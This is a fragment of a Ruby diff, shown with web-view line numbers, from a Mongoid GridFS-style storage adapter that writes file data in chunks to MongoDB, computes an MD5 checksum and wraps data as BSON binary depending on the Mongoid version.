break if chunk_data_size < DEFAULT_CHUNK_SIZE
|
263
|
+
chunk_num += 1
|
264
|
+
end
|
265
|
+
end
|
266
|
+
|
267
|
+
def write(file_id, data, options = {})
|
268
|
+
@setup_on_write = setup if @setup_on_write
|
269
|
+
|
270
|
+
md5 = Digest::MD5.new if options[:md5] != false
|
271
|
+
|
272
|
+
chunkerize(data) do |chunk_data, chunk_num|
|
273
|
+
chunks_collection.insert(files_id: file_id, n: chunk_num, data: binary(chunk_data))
|
274
|
+
md5.update(chunk_data) if md5
|
275
|
+
end
|
276
|
+
|
277
|
+
md5.hexdigest if md5
|
278
|
+
end
|
279
|
+
|
280
|
+
if Mongoid::VERSION < '4.0.0'
|
281
|
+
def binary(data)
|
282
|
+
data.force_encoding(BINARY_ENCODING) if data.respond_to?(:force_encoding)
|
283
|
+
BSON::Binary.new(:generic, data)
|
284
|
+
end
|
285
|
+
else
|
286
|
+
def binary(data)
|
287
|
+
data.force_encoding(BINARY_ENCODING) if data.respond_to?(:force_encoding)
|
288
|
+
BSON::Binary.new(data, :generic)
|
289
|
+
end
|
290
|
+
end
|
291
|
+
end
|
292
|
+
end
|
293
|
+
end
|
294
|
+
end
|